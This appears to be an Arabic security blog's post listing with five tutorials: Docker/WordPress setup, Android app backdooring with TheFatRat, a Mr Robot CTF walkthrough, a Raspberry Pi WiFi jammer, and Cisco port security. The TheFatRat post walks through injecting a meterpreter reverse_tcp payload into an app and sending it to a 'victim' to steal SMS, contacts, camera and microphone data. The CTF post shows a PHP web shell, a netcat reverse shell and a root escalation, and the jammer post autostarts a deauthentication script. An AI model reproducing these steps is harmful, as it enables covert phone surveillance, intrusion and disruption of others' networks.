0xabdullah

تقنية وامان

تثبيت Docker على السيرفر وتنصيب WordPress — أفريل 29, 2018

تثبيت Docker على السيرفر وتنصيب WordPress

ماهو Docker :

دوكر هي تقنية جديدة ونوعية شبيهة بالنظم الافتراضية (بالإنجليزية: Virtual System) ولكنها تقوم بعملية إنشاء نسخ افتراضية للنظام، وذلك من خلال إنتاج حاويات تتشارك فيها النواة مع النظام المضيف، حيث أن هذه الحاويات تلعب دور غلاف حاوي لتطبيق ما، بحيث يصبح قائما بذاته، مستقل؛ أي أن هذا التطبيق آو المشروع بكامل احتياجاته ليعمل يكون داخل حاوية (قد تكون حاوية واحدة أو عدة حاويات تتخاطب في ما بينها). [ويكيبيديا]

الشرح سيكون عن طريقه تثبيت Docker ومن خلاله سنقوم تثبيت WordPress على السيرفر

وطريقه ضبط الاعدادات بسهوله

في البدايه الشرح تم تطبيقه على سيرفر لينكس بنسخه ” Ubuntu “

سنقوم بتثبيت Docker من خلال الامر التالي

sudo apt-get install docker.io

sudo apt-get install docker-compose

الان قمنا بتثبيت Docker على السيرفر والخطوه التاليه هي ضبط الاعدادت لتثبيت wordpress

سنقوم بأنشاء مجلد بـ أي اسم تحبه مثل سنقوم بتسميته my_wordpress

من خلال الامر التالي:

mkdir my_wordpress

cd my_wordpress

ثم نسقوم بأنشاء ملف الاعداد لـ تثبيت

من خلال ملف “docker-compose.yml

من خلال الامر التالي :

nano docker-compose.yml

ونقوم بـ اخذ الاعدادات من موقع “docker.com” ونلصقها بملف docker-compose.yml

ملاحظه: توجد مشكلة في نسخه 3.3 لذلك يجب استبدالها بنسخه 2.0 في اعلى الملف

قبل حفظ الملف نقوم بتغيير بعض الاعدادات لزياده الامان والحمايه من الاختراق في حاله تم تثبيتها على سيرفر يمكن للجميع الوصول له مثل اسم قاعده البيانات واسم المستخدم والرقم السري للقاعده

في حالتي مثبته على شبكه داخليه لذلك لن اغير شي

بعد ذلك نقوم بحفظ ملف الاعدادات ثم بعد ذلك نقوم تشغيل Docker لـ تحميل نسخه الووردبريس واي شي ناقص على السيرفر بشكل تلقائي بدون اي تدخل منك

من خلال الامر التالي “لابد تكون داخل مجلد الذي قمت بعمله سابقا”:

docker-compose up -d

ننتظر حتى يتم الانتهى من تحميل المتطلباتها وتثبيتها .. بعد الانتهاء ندخل على المتصفح ونكمل تثبيت ووردبريس

اذا قمت بتثبيته على virtual machine ادخل رقم الاي بي الخاص بالجهاز

مثل:

http://MACHINE_VM_IP:8000

او اذا قمت بتثبيته على جهازك

مثل:

http://localhost:8000

ستظهر لك صفحه التثبيت

وينتهي الشرح الى هنا .

اختراق اجهزه الاندرويد عبر حقن التطبيقات من خلال اداة TheFatRat — أفريل 21, 2018

اختراق اجهزه الاندرويد عبر حقن التطبيقات من خلال اداة TheFatRat

في البداية هذا الشرح لـ اغراض تعليميه فقط !

سنقوم بـ استخدام اداه TheFatRat في هذا الدرس لـ حقن تطبيقات الاندرويد واختراق الاجهزه

تعتبر الاداه من اسهل الادوات في صنع  باب خلفي “BackDoor” لـ اختراق الاجهزه وهي ليست محصوره فقط على صنع باك دور على الاندرويد بل ايضا ويندوز وماك

وهناك انواع عديده وخيارات تقدمها لك الاداه لتسهل مهمتك في الاختراق

ومن مميزات المشروع:

 

Create backdoor for windows , linux , mac and android
bypass antivirus backdoorr
Checks for metasploit service and starts if not present
Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
Start multiple meterpreter reverse_tcp listners
Fast Search in searchsploit
Bypass AV
File pumper
Create backdoor with another techniq
Autorunscript for listeners ( easy to use )
Drop into Msfconsole

ولكن بهذا الشرح سنقوم بأستخدام الاداه في حقن تطبيقات الاندرويد

في البدايه نقوم بتحميل الاداه من هنا

git clone https://github.com/Screetsec/TheFatRat.git

تثبيت الاداه:

cd TheFatRat

chmod +x setup.sh && ./setup.sh

* قد ياخذ فتره من الوقت لـ التثبيت

بعد التثبيت نقوم بـ اعطاء ملفي fatrat و powerfull.sh صلاحيه من خلال تنفيذ الامرين التاليه:

chmod +x fatrat

chmod +x powerfull.sh

لـ تشغيل الاداه ننفذ الامر التالي:

fatrat/.

بعد تشغيل الاداه ستظهر لك قائمة بـ الخيارات !


[01] Create Backdoor with msfvenom
[02] Create Fud 100% Backdoor with Fudwin 1.0
[03] Create Fud Backdoor with Avoid v1.2
[04] Create Fud Backdoor with backdoor-factory
[05] Backdooring Original apk [Instagram, Line,etc]
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07] Create Backdoor For Office with Microsploit
[08] Trojan Debian Package For Remote Acces [Trodebi]
[09] Load/Create auto listeners
[10] Jump to msfconsole
[11] Searchsploit
[12] File Pumper [Increase Your Files Size]
[13] Configure Default Lhost & Lport
[14] Cleanup
[15] Help
[16] Credits
[17] Exit

بعد ذلك نقوم بـأختيار الخيار الخامس “Backdooring Original apk [Instagram, Line,etc]” لحقن تطبيق

ثم نقوم بـ أدخال الاي بي الخاص بنا والبورت

ثم نقوم بـ ادخال مسار التطبيق المراد حقنه

ثم نقوم بـ اختيار (android/meterpreter/reverse_tcp) كطريقه اتصال بيني وبين الهدف وهو اتصال عكسي

ثم ننتظر بعض الوقت حتى تاتينا رساله بأن تطبيقنا جاهز =D

Your RAT apk was successfully builded and signed , it is located here :
/home/xabdullah/TheFatRat/backdoored/app_backdoor.apk

الان نقوم بالدخول على مجلد backdoored

cd backdoored

الان تطبيقنا الي قمنا بحقنه موجود بأسم  app_backdoor.apk نقوم بتغيير اسمه الى أي أسم ثم نقوم بـ ارساله الى الضحيه ( انت وطريقتك )

بعدها نقوم بالدخول على Metasploit لـسيطره على جهاز الضحيه

ثم نقوم بـ استخدام multi_handler لتساعدنا على الارسال والاستقبال والتحكم عبر الامر التالي:

use exploit/multi/handler

ثم سنقوم بتحديد البايلود الي سبق قمن بحقنه بالتطبيق من خلال الامر التالي:

set payload android/meterpreter/reverse_tcp

ثم سنقوم بوضع الاي بي الخاص بنا الي سبق ووضعناه كوسيله اتصال, من خلال الامر التالي :

set LHOST 192.168.1.134

وايضا نطبق نفس الامر لـ البورت من خلال الامر التالي:

set LPORT 4444

ثم نقوم بكتابه run

نلاحظ بأن لا يوجد اتصال ,,, ساقوم بتثبيت التطبيق الان ونلاحظ بأن الاتصال سيتم ( صوره متحركه )

والان تم اختراق الجهاز بنجاح ويمكنك تنفيذ اي امر مثل سحب رسائل sms او جهات الاتصال او فتح الكاميرا والكثير والكثير من الامور

وهذه قائمة لـ ما يمكنك فعله مع الضحيه

Command Description
——- ———–
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for “load”
uuid Get the UUID for the current session
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system’s local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
screenshot Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

Command Description
——- ———–
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam

Android Commands
================

Command Description
——- ———–
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information

اذا اردت تغيير ايقونه التطبيق

قم بنسخ الايقونه ثم توجه الى مجلد “TheFatRat/icons” ثم قبل بـتغيير اسم الايقونه الى (autorun.ico) ووافق على الاستبدال

وبكذا يكون انتهى الشرح,, اتمنى يكون واضح وسهل على الجميع, اذا كانت هناك معلومه ناقصه او غير صحيحه يمكنك مراسلتي بتويتر عبر حسابي 0xAbdullah جل من لا يخطئ.

حل: CTF – Mr Robot — مارس 2, 2018

حل: CTF – Mr Robot

في بداية الامر ساوضح بعض الامور عن CTF

CTF هي أختصار لـ “Capture the Flag

وهي تحدي يدخل به المخترق او مجموعات المخترقين لـ حل الالغاز والوصول الى الهدف وفي كل مره تحل لغز تسحصل على معلومه مهمه تقودك الى المعلمه التالي التي يجب عليك الحصول عليها لـ الوصول للهدف النهائي

وساقوم بشرح اليوم عن تحدي Mr Robot وطريقه الوصول الى الهدف النهائي وهو الحصول على صلاحية root 😉

وساكون بعيد كل البعد عن الامور النظرية سيكون الشرح عملي بشكل كامل ( مع شرح بعض الامور )

ملاحظه: طريقه حل التحدي تختلف من شخص لـ شخص اخر, المخترقين لا يملكون نفس العقليه ( المجال مفتوح وكل الامور متاحه لـ الوصول للهدف النهائي )

سنقوم بتحميل النظام المراد اختراقه

https://www.vulnhub.com/entry/mr-robot-1,151

بعد ذلك نقوم بتنصيبه على virtual machine

بعد تثبيت النظام وتشغيله مباشره سيبدا التحدي

واول خطوه نقوم بها فحص الشبكة الخاصه بنا لكي نحصل على IP الهدف ومعرفه المنافذ المفتوحه عن طريق nmap

ننفذ الامر التالي عشان نستخرج الاجهزه بالشبكة ( مع تغييره لرقم شبكتك )

nmap -sn 192.168.1.1/24

نلاحظ بعد تنفذ الامر والفحص ظهرت لنا مجموعه من IP و MAC للاجهزه المتصله معنا بنفس الشبكة

ونلاحظ بأن الجهاز هذا هو الوحيد اسمه ( Oracle VirtualBox virtual NIC ) فـ هذا هدفنا 🙂 < الامر يختلف طبعاً من جهاز الى جهاز اخر

الان سنقوم بجمع المعلومات عن الهدف بخصوص المنافذ المفتوحه

وننفذ الامر التالي

nmap -F 192.168.1.140

هنا نشوف بأن المنافذ المفتوحه على IP الهدف هي 80 و 443 ومنفذ 22 مغلق

PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https

بكذا نعرف ان الهدف يستخدم ويب سيرفر

الان سنقوم بفحص السيرفر من خلال اداه nikto وهي متواجده في اغلب التوزيعات الامنية

لكي نفحص السيرفر ننفذ الامر التالي

nikto -h 192.168.1.144

ستظهر لنا معلومات كثيره عن السيرفر

ومن اهم هذي المعلومات

ملف robots.txt

ومسار لوحة التحكم wp-login

وكما يظهر لنا الموقع يستخدم wordpress

الان نقوم بفحص ملف robots.txt بالدخول عليه من خلال المتصفح

وجدنا انه يحتوي على مسارين لـ ملفين الاول كلمات وكما يبدوا انها wordlist

والاخر هو المفتاح الاول وبكذا انت حليت اول لغز =D

طبعا الان نقوم بعمل مجلد عندنا ونحمل الملفات فيه عشان ماتضيع المعلومات منها ونرجع لها بشكل سريع لو احجتنا أي معلومة مستخرجه

بعد ذلك بندخل على لوحة التحكم وبنحاول نستخرج اسم المستخدم وكلمة المرور

قبل كذا خلونا نشوف كم عدد الكلمات الي بملف fsocity.dic

من خلال تطبيق الامر التالي

wc –w fsocity.dic

ويظهر عدد الكلمات الموجوده بالملف 858160 ( اوووب )

بناخذ وقت طويل في عملية التخمين على هذا العدد الكبير !

فلذلك الي راح نسويه هو باننا بنستعرض الكلمات الغير مكرره لـ اختصار الوقت علينا وحفظها بملف اخر مع الاحتفاظ بالنسخه الاصليه من الملف قد لا تنجح العملية معنا 🙂

ويكون هالشي من خلال تنفيذ الامر التالي

sort fsocity.dic | uniq -u > wordlist.txt

نرجع ننفذ الامر لنعرف عدد الكلمات الي ظهرت معنا بعد ماقمنا بـ اخذ الكلمات الغير مكرره بالملف

من خلال الامر التالي

wc –w wordlist.txt

ويظهر عدد الكلمات 10 فقط =D

تمام في الخطوه القادمه بقيت اخمن على اسم المستخدم وضعت مجموعه من الاسماء

مثل admin, user , root , administration

وجميعها لم تنجح ! اعتقدت بأن الكلمات الي استخرجناها العشر توجد بها مشكلة

ولكن بعد قراه الوصف

لـ الهدف عرفت كيف اختار مجموعه اسماء مستخدمين محتمل ان تكون صحيحه !

طبعا طريقه التخمين هي تدخل على صفحه استعاده كلمة المرور ووضع الاسماء فيها

http://192.168.1.144/wp-login.php?action=lostpassword

مثل ما نشاهد هنا وضعنا الاسم MrRobot وايضا خطا .. خلونا نجرب نضع اسم Elliot

الان مثل ماتشوفون تغيرت الرساله وان الايميل لايمكن ان يرسل, بمعنى هو الاسم الصحيح =D

الان نسخدم اداه WPscan ونخمن على اليوزر

من خلال الامر التالي

wpscan –url http://192.168.1.144 –username Elliot –wordlist /wordlist.txt

ملاحظه : لابد وضع مسار كلمات المرور كامل

وبكذا طلعنا الباسورد =D

ونجرب ندخل لوحة التحكم للموقع

وبكذا الان حنا دخلنا لوحة التحكم بنجاح, الان خلونا نرفع شل على الموقع عشان نقدر نحكم فيه ونعمل اتصال عكسي

الان نذهب الى Appearance ومن ثم اختيار editor والتعديل على 404.php وحذف ما بداخله ونضع بداله كود الشل ثم نضغط على Update File

وندخل على اي صفحه ليست موجوده بالموقع لجل يحولنا على صفحه 404

على سبيل المثال بدخل على صفحه

http://192.168.1.144/0xabdullah

وبكذا رفعنا الشل بنجاح الان نذهب الى   [Back-Connection] لعمل اتصال عكسي مع السيرفر

قبل الضغط على زر Connect نذهب الى تيرمنال بجهازنا وننفذ الامر التالي

nc -l -n -v -p 5992

ثم نضغط على زر Connect

الان نذهب الى تيرمنال ونلاحظ ان الاتصال العكسي تم بنجاح

الان نريد استخراج العلم الثاني وحل اللغز حتى نصل الى الهدف النهائي

طبعا بحالتنا هذه عندك خيارين الان تبحث من خلال الاتصال العكسي او من خلال الشل المرفوع

والاسهل بالتنقل واسرع هو الشل, فلذلك خلونا نبحث في ملفات السيرفر ونطلع علمنا الثاني ونلتقطه =D

من خلال البحث في ملفات السيرفر وجدت مسار /home/robot/ ويجد به ملفين

كما تشاهدون الملف الاول هو : key-2-of-3.txt ولكن لا توجد لنا صلاحية لـ الاطلاع عليه فلذلك نحن لم نلتقط العلم الثاني حتى الان 😦 !

ولكن يوجد ملف اخر وهو: password.raw-md5 بعد فتح الملف ظهر لنا يوزر وباسورد مشفر بـMD5

واليوزر بـ اسم robot

الان خلونا نحاول كسر التشفير بالطريقه السهله وهو البحث بقوقل عن الهاش لاظهار المواقع التي تحتفظ بالهاش في قواعدها وهل تم كسره او لا

c3fcd3d76192e4007dfb496cca67e13b

وجدت الهاش بالفعل تم كسره

الباسورد هو:

abcdefghijklmnopqrstuvwxyz

نلاحظ من خلال مسار “/home/robot/” بأن robot يوزر بالسيرفر الي سبق وكسرنا تشفير كلمة المرور الخاصه به

نرجع الى الاتصال العكسي ونحاول ندخل على اليوزر من خلال الامر التالي

su robot

ولكن للاسف لايمكنا ذلك, نحتاج ندخل على shell داخل النظام لتغيير اليوزر

واسهل طريقه لدخول shell بالنظام هي فحص السيرفر هل مثبت عليه بايثون او لا ؟ ننفذ الامر التالي ونشوف النتيجه اذا ظهرت لنا علامه $ يعني قدرنا ندخل على shell

python -c 'import pty; pty.spawn("/bin/sh")'

كما نلاحظ قدرنا ندخل على shell وايضا الدخول على يوزر robot

الان نريد التقاط العلم الثاني ومن خلال تيرنمال نذهب الى مسار /home/robot

وسنجد الملفين السابقين ولكن نريد قراه ملف key-2-of-3.txt

من خلال الامر التالي

cat key-2-of-3.txt

822c73956184f694993bede3eb39f959

وبكذا حصلنا على العلم الثاني =D

طيب الان باقي اخر علم ولكن لا نملك صلاحية على باقي الملفات والمجلدات

ابسط طريقه هي استغلال ثغرات في البرامج تسمح لك تنفذ اوامر كـroot

ولذلك خلونا نفحص امر بسيط في nmap وبوريك صوره من جهازي وصوره من سيرفر الهدف

nmap -sO 192.168.1.1

جربت انفذ هالامر بجهازي ولكن الرد كان ببساطه

You requested a scan type which requires root privileges.

طيب بالمقابل خلونا ننفذ الامر بسيرفر الهدف ونشوف الرد =D

تمام ! نفذ الامر بدون يطلب صلاحية روت, وهذا الشي نقدر نستغله من خلال الدخول على Interactive في nmap من خلال الامر التالي

nmap –interactive

الان ندخل على shell من خلال تنفيذ الامر التالي

!sh

الان ببساطه نشوف علامه # =D

خلونا نتاكد ونشوف وش صلاحيتنا

واو كذا تمام جدا =D

الان خلونا ندور على علمنا الثالث والاخير وننهي التحدي !

من خلال البحث في ملفات السيرفر وجدت العلم الثالث داخل مجلد root

وبكذا انهينا التحدي 😉 والسيرفر تحت تحكمك بشكل كامل =D

هذا ما عندي فإن أحسنت فمن الله، وإن أسأت أو أخطأت فمن نفسي والشيطان

صنع مشوش شبكات WiFi بواسطه RaspberryPi — جانفي 8, 2018

صنع مشوش شبكات WiFi بواسطه RaspberryPi

في البدايه هذا الشرح لـ اغراض تعليميه و لا اتحمل المسئولية ما تقوم به

 

نحتاج في هذا الشرح الى :

  • Raspberry Pi

  • كرت وايرلس خارجي

سنقوم بالدخول على الراسبيري باي من خلال SSH

ثم نقوم بأنشاء مجلد بـ اسم  wifijammer

mkdir wifijammer

ثم نقوم بالدخول على المجلد

cd wifijammer

ونقوم بأنشاء ملف بأسم wifijammer.py

nano wifijammer.py

 

الان نحتاج تحميل سكربت wifijammer مبرمج من قبل Dan McInerney

من خلال هذا الرابط

https://raw.githubusercontent.com/DanMcInerney/wifijammer/master/wifijammer.py

ونقوم بنسخ الكود بالكامل ثم لصقه داخل ملف wifijammer.py ثم نقوم بحفظ الملف بالضغط على Ctrl+x ثم y ثم نضغط على انتر

والان نريد اعطاء الملف تصريح من خلال الامر التالي

sudo chmod +x wifijammer.py

حتى الان قمنا بعمل ملف وتحميل السكربت, سنحتاج الان لتفعيل السكربت بشكل تلقائي عند تشغيل الراسبيري باي

نقوم بالدخول على مجلد etc ثم تعديل ملف rc.local

cd /etc

sudo nano rc.local

ثم نذهب الى السطر قبل الاخير فوق كلمة “exit 0” ونقوم بـ اضافه السطر الاتي

sudo /home/pi/wifijammer/wifijammer.py &

ثم نقوم بحفظ التعديل بالضغط على Ctrl+x ثم y ثم نضغط على انتر

الان نعيد تشغيل الراسبيري باي من خلال امر

sudo reboot

وعند تشغيله سيقوم بالتشويش على جميع الشبكات من حولك .

 

تكوين أمان المنفذ الديناميكي [sticky] — ديسمبر 24, 2017

تكوين أمان المنفذ الديناميكي [sticky]

سابقا قمت بشرح طريقه تثبيت عنوان ماك لمنفذ معين يدوياً

http://0xa.tech/archives/97

وبشرح التالي ساقوم بشرح طريقه تثبيت عنوان الماك تلقائي للجهاز المتصل بالمنفذ

 

S1#
الدخول للاعدادات السويتش <  S1#config t

 أختيار المنفذ المراد تثبيت الماك عليه < S1(config)#interface fastEthernet 0/11
اعطاء صلاحيه الوصول للمنفذ < S1(config-if)#switchport mode access
تفعيل الـ بورت-سكيورتي < S1(config-if)#switchport port-security
وضع رقم لمحاوله الاتصال على المنفذ وهي تسمح لـ3 اجهزه فقط للاتصال بالمنفذ هذا < S1(config-if)#switchport port-security maximum 3
هنا يقوم السويتش بأخذ الماك للجهاز المتصل بالمنفذ تلقائي وتثبيته على المنفذ < S1(config-if)#switchport port-security mac-address sticky

ولتاكد من الاوامر المدخله

S1#show port-security interface fastEthernet 0/11

 الحاله هنا مفعل < Port Security : Enabled

البورت محمي < Port Status : Secure-up

رده فعل البورت في حاله تم تخطي العدد الاجهزه المتصله بالبورت  < Violation Mode : Shutdown

Aging Time : 0 mins

Aging Type : Absolute

SecureStatic Address Aging : Disabled

 هنا عدد الماك ادرس المسموح له بالاتصال < Maximum MAC Addresses : 3

Total MAC Addresses : 1

Configured MAC Addresses : 0

Sticky MAC Addresses : 1

رقم اخر ماك ادرس تم الاتصال به على المنفذ  < Last Source Address:Vlan : 0001.9684.893D:1